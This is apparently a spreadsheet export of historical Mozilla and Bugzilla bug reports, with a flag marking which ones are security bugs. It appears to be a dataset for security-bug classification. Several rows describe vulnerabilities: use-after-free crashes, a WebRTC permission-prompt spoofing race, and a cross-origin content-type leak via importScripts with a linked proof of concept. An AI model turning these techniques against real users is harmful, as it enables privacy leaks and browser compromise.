
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/>
  <Override PartName="/xl/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xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
</Types>
</file>

<file path=_rels/.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml" Id="rId1"/><Relationship Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml" Id="rId2"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml" Id="rId3"/></Relationships>
</file>

<file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <workbookPr/>
  <workbookProtection/>
  <bookViews>
    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
  </bookViews>
  <sheets>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Sheet1" sheetId="1" state="visible" r:id="rId1"/>
  </sheets>
  <definedNames/>
  <calcPr calcId="124519" fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="0"/>
  <fonts count="2">
    <font>
      <name val="Calibri"/>
      <family val="2"/>
      <color theme="1"/>
      <sz val="11"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b val="1"/>
    </font>
  </fonts>
  <fills count="2">
    <fill>
      <patternFill/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
  </fills>
  <borders count="2">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin"/>
      <right style="thin"/>
      <top style="thin"/>
      <bottom style="thin"/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="center" vertical="top"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0" hidden="0"/>
  </cellStyle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styleSheet>
</file>

<file path=xl/_rels/workbook.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="/xl/worksheets/sheet1.xml" Id="rId1"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId3"/></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sheetPr>
    <outlinePr summaryBelow="1" summaryRight="1"/>
    <pageSetUpPr/>
  </sheetPr>
  <dimension ref="A1:X6470"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>bug_id</t>
        </is>
      </c>
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>creation_ts</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>summary</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>delta_ts</t>
        </is>
      </c>
      <c r="E1" s="1" t="inlineStr">
        <is>
          <t>reporter_accessible</t>
        </is>
      </c>
      <c r="F1" s="1" t="inlineStr">
        <is>
          <t>cclist_accessible</t>
        </is>
      </c>
      <c r="G1" s="1" t="inlineStr">
        <is>
          <t>classification_id</t>
        </is>
      </c>
      <c r="H1" s="1" t="inlineStr">
        <is>
          <t>classification</t>
        </is>
      </c>
      <c r="I1" s="1" t="inlineStr">
        <is>
          <t>product</t>
        </is>
      </c>
      <c r="J1" s="1" t="inlineStr">
        <is>
          <t>component</t>
        </is>
      </c>
      <c r="K1" s="1" t="inlineStr">
        <is>
          <t>version</t>
        </is>
      </c>
      <c r="L1" s="1" t="inlineStr">
        <is>
          <t>rep_platform</t>
        </is>
      </c>
      <c r="M1" s="1" t="inlineStr">
        <is>
          <t>op_sys</t>
        </is>
      </c>
      <c r="N1" s="1" t="inlineStr">
        <is>
          <t>bug_status</t>
        </is>
      </c>
      <c r="O1" s="1" t="inlineStr">
        <is>
          <t>resolution</t>
        </is>
      </c>
      <c r="P1" s="1" t="inlineStr">
        <is>
          <t>status_whiteboard</t>
        </is>
      </c>
      <c r="Q1" s="1" t="inlineStr">
        <is>
          <t>priority</t>
        </is>
      </c>
      <c r="R1" s="1" t="inlineStr">
        <is>
          <t>bug_severity</t>
        </is>
      </c>
      <c r="S1" s="1" t="inlineStr">
        <is>
          <t>target_milestone</t>
        </is>
      </c>
      <c r="T1" s="1" t="inlineStr">
        <is>
          <t>everconfirmed</t>
        </is>
      </c>
      <c r="U1" s="1" t="inlineStr">
        <is>
          <t>votes</t>
        </is>
      </c>
      <c r="V1" s="1" t="inlineStr">
        <is>
          <t>comment_count</t>
        </is>
      </c>
      <c r="W1" s="1" t="inlineStr">
        <is>
          <t>description</t>
        </is>
      </c>
      <c r="X1" s="1" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="n">
        <v>1000185</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>2014-04-23 07:23:10 -0700</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t>ASAN heap-use-after-free in RefreshDriverTimer::TickDriver</t>
        </is>
      </c>
      <c r="D2" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:55 -0700</t>
        </is>
      </c>
      <c r="E2" t="n">
        <v>1</v>
      </c>
      <c r="F2" t="n">
        <v>1</v>
      </c>
      <c r="G2" t="n">
        <v>3</v>
      </c>
      <c r="H2" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2" t="inlineStr">
        <is>
          <t>[asan][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q2" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2" t="n">
        <v>1</v>
      </c>
      <c r="U2" t="n">
        <v>0</v>
      </c>
      <c r="V2" t="n">
        <v>39</v>
      </c>
      <c r="W2" t="inlineStr">
        <is>
          <t>Created attachment 8411023
crash.html
The attached testcase crashes the latest ASAN build. Crash was also confirmed on windows with the current release build. The attached testcase requires ovaling_fast.svg. Takes about 20-30 seconds to trigger.
ASAN output attached in asan.txt</t>
        </is>
      </c>
      <c r="X2" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="n">
        <v>961512</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>2014-01-19 11:35:49 -0800</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t>WebRTC permission prompt can show the wrong domain name, potentially making it possible for the page to spoof the domain name the access to the webcam/mic is requested from</t>
        </is>
      </c>
      <c r="D3" t="inlineStr">
        <is>
          <t>2014-04-25 12:49:26 -0700</t>
        </is>
      </c>
      <c r="E3" t="n">
        <v>1</v>
      </c>
      <c r="F3" t="n">
        <v>1</v>
      </c>
      <c r="G3" t="n">
        <v>3</v>
      </c>
      <c r="H3" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K3" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3" t="inlineStr">
        <is>
          <t>[fixed by bug 949907][adv-main28+]</t>
        </is>
      </c>
      <c r="Q3" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3" t="n">
        <v>1</v>
      </c>
      <c r="U3" t="n">
        <v>0</v>
      </c>
      <c r="V3" t="n">
        <v>55</v>
      </c>
      <c r="W3" t="inlineStr">
        <is>
          <t>Created attachment 8362259
Screenshot
I was on hacker news and I clicked a link to rtc.io, went to their demo pages, clicked on http://hughsk.github.io/post-process/, and I think the browser janked for a moment and I pressed back to get back to the hacker news webpage, which is when the WebRTC prompt appeared, showing the wrong domain name as can be seen in the screenshot.  Now, the doorhanger prompt is attached to the hacker news page as if the request originally came from that page.
This seems to be a race condition which an attacker may be able to employ as one step to convince the user that a legit website is trying to access their webcam/mic.</t>
        </is>
      </c>
      <c r="X3" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="n">
        <v>1740985</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>2021-11-12 18:20:43 -0800</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>Detecting whether the content-type of a cross-origin resource is application/javascript through importScripts</t>
        </is>
      </c>
      <c r="D4" t="inlineStr">
        <is>
          <t>2024-06-04 12:05:50 -0700</t>
        </is>
      </c>
      <c r="E4" t="n">
        <v>1</v>
      </c>
      <c r="F4" t="n">
        <v>1</v>
      </c>
      <c r="G4" t="n">
        <v>3</v>
      </c>
      <c r="H4" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K4" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q4" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T4" t="n">
        <v>1</v>
      </c>
      <c r="U4" t="n">
        <v>0</v>
      </c>
      <c r="V4" t="n">
        <v>20</v>
      </c>
      <c r="W4" t="inlineStr">
        <is>
          <t>Created attachment 9250556
index.html
It is possible to import external resources from within a Web Worker using the "importScripts" function, and by checking the error message, confirm whether the content-type is application/javascript or not.
The error message that is shown when a script failed to load due to having an incorrect content-type ("NetworkError: WorkerGlobalScope.importScripts: Failed to load worker script at https://victim.com/xyz.js (nsresult = 0x804b001d)") should be the same as when the script failed to load when having a correct content-type, but invalid syntax ("NetworkError: A network error occurred").
This vulnerability is useful for XS-Search attacks. A real-world example is https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549 (more on https://github.com/xsleaks/xsleaks/wiki/Real-World-Examples).
VERSION
Version: 94.0.1 (64-bit)
Operating System: Windows 10
REPRODUCTION CASE
1. Access https://lbherrera.github.io/lab/firefox/detect-js-53ffdde341/index.html
2. Click on the "check" button and a message confirming that the content-type of the resource is "application/javascript" will be displayed.
3. Change the URL to a resource that doesn't contain the "application/javascript" content-type set and click on the "check" button.
I have also attached the file used in the PoC - if you prefer, you can reproduce the attack by downloading and hosting index.html on a web server.
CREDIT INFORMATION
Reporter credit: Luan Herrera (@lbherrera_)</t>
        </is>
      </c>
      <c r="X4" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="n">
        <v>312498</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>2005-10-14 13:24:15 -0700</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>[SECURITY] editparams.cgi doesn't check whether 'whinedays' and 'mostfreqthreshold' are numeric</t>
        </is>
      </c>
      <c r="D5" t="inlineStr">
        <is>
          <t>2006-04-23 12:21:44 -0700</t>
        </is>
      </c>
      <c r="E5" t="n">
        <v>1</v>
      </c>
      <c r="F5" t="n">
        <v>1</v>
      </c>
      <c r="G5" t="n">
        <v>4</v>
      </c>
      <c r="H5" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L5" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5" t="inlineStr">
        <is>
          <t>[ready for 2.16.11][ready for 2.18.5][ready for 2.20.1][ready for 2.21.2]</t>
        </is>
      </c>
      <c r="Q5" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5" t="n">
        <v>1</v>
      </c>
      <c r="U5" t="n">
        <v>0</v>
      </c>
      <c r="V5" t="n">
        <v>19</v>
      </c>
      <c r="W5" t="inlineStr">
        <is>
          <t>Inadvertently writting '4r' instead of '4' for the 'whinedays' param caused
whineatnews.pl to crash:
whineatnews.pl: DBD::mysql::st execute failed: Unknown column '4r' in 'where
clause' [for Statement "SELECT bug_id, short_desc, login_name FROM bugs INNER
JOIN profiles ON userid = assigned_to WHERE (bug_status = 'NEW' OR bug_status =
'REOPENED') AND TO_DAYS(NOW()) - TO_DAYS(delta_ts) &gt; 4r ORDER BY bug_id"] at
Bugzilla/DB.pm line 84
editparams.cgi should make sure that a valid numeric value is given.</t>
        </is>
      </c>
      <c r="X5" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="n">
        <v>178800</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>2002-11-06 21:30:40 -0800</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>Graphical Charts fail with taint error with perl 5.6.0</t>
        </is>
      </c>
      <c r="D6" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E6" t="n">
        <v>1</v>
      </c>
      <c r="F6" t="n">
        <v>1</v>
      </c>
      <c r="G6" t="n">
        <v>4</v>
      </c>
      <c r="H6" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L6" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6" t="inlineStr"/>
      <c r="Q6" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T6" t="n">
        <v>1</v>
      </c>
      <c r="U6" t="n">
        <v>0</v>
      </c>
      <c r="V6" t="n">
        <v>13</v>
      </c>
      <c r="W6" t="inlineStr">
        <is>
          <t>On sites with 5.6.0 (mothra), queries for graphical charts such as severity
versus status are tainted.
This is most likely due to taints being propagated through 
 my @selectnames = map($columns{$_}, @axis_fields);
in report.cgi</t>
        </is>
      </c>
      <c r="X6" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="n">
        <v>220516</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>2003-09-27 19:58:37 -0700</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>[FIX]crash in sort by speed [@ XULSortServiceImpl::Sort]</t>
        </is>
      </c>
      <c r="D7" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:37 -0700</t>
        </is>
      </c>
      <c r="E7" t="n">
        <v>1</v>
      </c>
      <c r="F7" t="n">
        <v>1</v>
      </c>
      <c r="G7" t="n">
        <v>3</v>
      </c>
      <c r="H7" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I7" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L7" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M7" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N7" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O7" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P7" t="inlineStr"/>
      <c r="Q7" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R7" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S7" t="inlineStr">
        <is>
          <t>mozilla1.6alpha</t>
        </is>
      </c>
      <c r="T7" t="n">
        <v>1</v>
      </c>
      <c r="U7" t="n">
        <v>0</v>
      </c>
      <c r="V7" t="n">
        <v>7</v>
      </c>
      <c r="W7" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6a) Gecko/20030927
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.6a) Gecko/20030927
when I use sort by speed, with no download in progress, mozilla crash
Reproducible: Always
Steps to Reproduce:
1.no download in progress
2.Tools &gt; Donload manager
3.sort by speed
4.mozilla crash
Actual Results:  
crash
Expected Results:  
don't crash
build id: 2003092704
MOZILLA causou uma falha de página inválida no
módulo GKLAYOUT.DLL em 015f:615873ea.
Registros:
EAX=00000000 CS=015f EIP=615873ea EFLGS=00010246
EBX=ffffffff SS=0167 ESP=0065e43c EBP=0065e458
ECX=0226a040 DS=0167 ESI=00000000 FS=24ff
EDX=0185bc3c ES=0167 EDI=0185a740 GS=0000
Bytes em CS:EIP:
8b 06 ff 90 9c 00 00 00 85 c0 74 6e 8b 45 fc 83 
Esvaziamento da pilha:
00000000 00000010 61634914 00000000 80000000 02219420 006eb45c 0065e724 61588580
0226a040 0065e6b8 00000000 0065e78c 0065e904 00747619 61da4758</t>
        </is>
      </c>
      <c r="X7" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="n">
        <v>1015973</v>
      </c>
      <c r="B8" t="inlineStr">
        <is>
          <t>2014-05-26 07:41:48 -0700</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file ../../../dist/include/nsUTF8Utils.h, line 422</t>
        </is>
      </c>
      <c r="D8" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:08 -0700</t>
        </is>
      </c>
      <c r="E8" t="n">
        <v>1</v>
      </c>
      <c r="F8" t="n">
        <v>1</v>
      </c>
      <c r="G8" t="n">
        <v>3</v>
      </c>
      <c r="H8" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I8" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L8" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M8" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N8" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O8" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P8" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q8" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R8" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S8" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T8" t="n">
        <v>1</v>
      </c>
      <c r="U8" t="n">
        <v>0</v>
      </c>
      <c r="V8" t="n">
        <v>30</v>
      </c>
      <c r="W8" t="inlineStr">
        <is>
          <t>Created attachment 8428721
mutant582.pem
The attached certificate causes the following failure (mozilla-central bf98b86fbea2):
Running test with PKIX
System JS : ERROR (null):0 - uncaught exception: 2147500037
[11681] ###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file ../../../dist/include/nsUTF8Utils.h, line 422
[11681] ###!!! ASSERTION: Not a UTF-8 string. This code should only be used for converting from known UTF-8 strings.: 'Error', file ../../../dist/include/nsUTF8Utils.h, line 422
Hit MOZ_CRASH() at memory/mozalloc/mozalloc_abort.cpp:30
ASAN:SIGSEGV
=================================================================
==11681==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f3447e4a73a sp 0x7fff6bc6af00 bp 0x7fff6bc6af10 T0)
    #0 0x7f3447e4a739 in mozalloc_abort(char const*) memory/mozalloc/mozalloc_abort.cpp:30
    #1 0x7f343b4f26ad in Abort(char const*) xpcom/base/nsDebugImpl.cpp:435
    #2 0x7f343b4f237a in NS_DebugBreak xpcom/base/nsDebugImpl.cpp:422
    #3 0x7f343b4f099f in CalculateUTF8Length::write(char const*, unsigned int) objdir-ff-asan64dbg/xpcom/string/src/../../../dist/include/nsUTF8Utils.h:422
    #4 0x7f343b4d4a4a in nsCharSinkTraits&lt;CalculateUTF8Length&gt;::write(CalculateUTF8Length&amp;, char const*, unsigned int) objdir-ff-asan64dbg/xpcom/string/src/../../../dist/include/nsCharTraits.h:587
    #5 0x7f343b4d4a4a in CalculateUTF8Length&amp; copy_string&lt;nsReadingIterator&lt;char&gt;, CalculateUTF8Length&gt;(nsReadingIterator&lt;char&gt; const&amp;, nsReadingIterator&lt;char&gt; const&amp;, CalculateUTF8Length&amp;) objdir-ff-asan64dbg/xpcom/string/src/../../../dist/include/nsAlgorithm.h:73
    #6 0x7f343b4d4a4a in AppendUTF8toUTF16(nsACString_internal const&amp;, nsAString_internal&amp;, mozilla::fallible_t const&amp;) xpcom/string/src/nsReadableUtils.cpp:196
    #7 0x7f343b4d3bb7 in AppendUTF8toUTF16(nsACString_internal const&amp;, nsAString_internal&amp;) xpcom/string/src/nsReadableUtils.cpp:185
    #8 0x7f343b4d3e8b in AppendUTF8toUTF16(char const*, nsAString_internal&amp;) xpcom/string/src/nsReadableUtils.cpp:243
    #9 0x7f3440e1e2d8 in NS_ConvertUTF8toUTF16 objdir-ff-asan64dbg/security/manager/ssl/src/../../../../dist/include/nsString.h:158
    #10 0x7f3440e1e2d8 in mozilla::RefPtr&lt;nsIX509Cert&gt;::operator nsIX509Cert*() const security/manager/ssl/src/TransportSecurityInfo.cpp:795
    #11 0x7f3440e1e2d8 in mozilla::psm::formatOverridableCertErrorMessage(nsISSLStatus&amp;, int, nsXPIDLCString const&amp;, int, bool, bool, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:1010
    #12 0x7f3440e1e2d8 in mozilla::psm::TransportSecurityInfo::formatErrorMessage(mozilla::BaseAutoLock&lt;mozilla::Mutex&gt; const&amp;, int, mozilla::psm::SSLErrorMessageType, bool, bool, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:249
    #13 0x7f3440e20611 in mozilla::psm::TransportSecurityInfo::GetErrorLogMessage(int, mozilla::psm::SSLErrorMessageType, nsString&amp;) security/manager/ssl/src/TransportSecurityInfo.cpp:209
    #14 0x7f3440e5931b in mozilla::RefPtr&lt;mozilla::psm::TransportSecurityInfo&gt;::operator mozilla::psm::TransportSecurityInfo*() const security/manager/ssl/src/SSLServerCertVerification.cpp:223
    #15 0x7f3440e5931b in mozilla::psm::(anonymous namespace)::CertErrorRunnable::CheckCertOverrides() security/manager/ssl/src/SSLServerCertVerification.cpp:536
    #16 0x7f3440e5931b in mozilla::psm::(anonymous namespace)::CertErrorRunnable::RunOnTargetThread() security/manager/ssl/src/SSLServerCertVerification.cpp:548
    #17 0x7f3440e13f93 in mozilla::psm::SyncRunnableBase::Run() security/manager/ssl/src/PSMRunnable.cpp:35
When running without aborting, I also hit this assertion afterwards:
###!!! ASSERTION: Input wasn't UTF8 or incorrect length was calculated: 'Error', file xpcom/string/src/nsReadableUtils.cpp, line 222
Marked s-s until investigated and confirmed to be harmless.</t>
        </is>
      </c>
      <c r="X8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="n">
        <v>82584</v>
      </c>
      <c r="B9" t="inlineStr">
        <is>
          <t>2001-05-24 12:16:33 -0700</t>
        </is>
      </c>
      <c r="C9" t="inlineStr">
        <is>
          <t>Security problem: Opening *.doc files instead of file save with no warning or dialog with default MSWindows+MSOffice settings</t>
        </is>
      </c>
      <c r="D9" t="inlineStr">
        <is>
          <t>2001-07-13 11:03:10 -0700</t>
        </is>
      </c>
      <c r="E9" t="n">
        <v>1</v>
      </c>
      <c r="F9" t="n">
        <v>1</v>
      </c>
      <c r="G9" t="n">
        <v>3</v>
      </c>
      <c r="H9" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I9" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L9" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M9" t="inlineStr">
        <is>
          <t>Windows ME</t>
        </is>
      </c>
      <c r="N9" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O9" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P9" t="inlineStr">
        <is>
          <t>fix in hand</t>
        </is>
      </c>
      <c r="Q9" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R9" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S9" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T9" t="n">
        <v>1</v>
      </c>
      <c r="U9" t="n">
        <v>0</v>
      </c>
      <c r="V9" t="n">
        <v>22</v>
      </c>
      <c r="W9" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:0.9+) Gecko/20010524
BuildID:    20010514
